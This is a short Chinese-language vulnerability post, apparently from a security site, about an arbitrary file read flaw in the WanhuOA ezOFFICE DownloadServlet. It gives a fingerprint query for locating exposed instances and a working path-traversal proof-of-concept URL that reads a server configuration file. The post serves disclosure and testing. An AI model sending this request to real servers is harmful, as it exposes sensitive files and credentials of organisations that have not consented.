WanhuOA DownloadServlet 任意文件读取漏洞
# WanhuOA DownloadServlet 任意文件读取漏洞
## 漏洞描述
WanhuOA DownloadServlet接口存在任意文件读取漏洞,攻击者通过漏洞可以读取服务器中的敏感文件,获取敏感信息
## 漏洞影响...
WanhuOA DownloadServlet 任意文件读取漏洞
漏洞描述
WanhuOA DownloadServlet接口存在任意文件读取漏洞,攻击者通过漏洞可以读取服务器中的敏感文件,获取敏感信息
漏洞影响
WanhuOA
网络测绘
app="Wanhu网络-ezOFFICE"
漏洞复现
产品页面
验证POC
/defaultroot/DownloadServlet?modeType=0&key=x&path=..&FileName=WEB-INF/classes/fc.properties&name=x&encrypt=x&cd=&downloadAll=2
- 发表于 2024-07-12 18:44:35
- 阅读 ( 2151 )
- 分类:OA产品
带头大哥
456 篇文章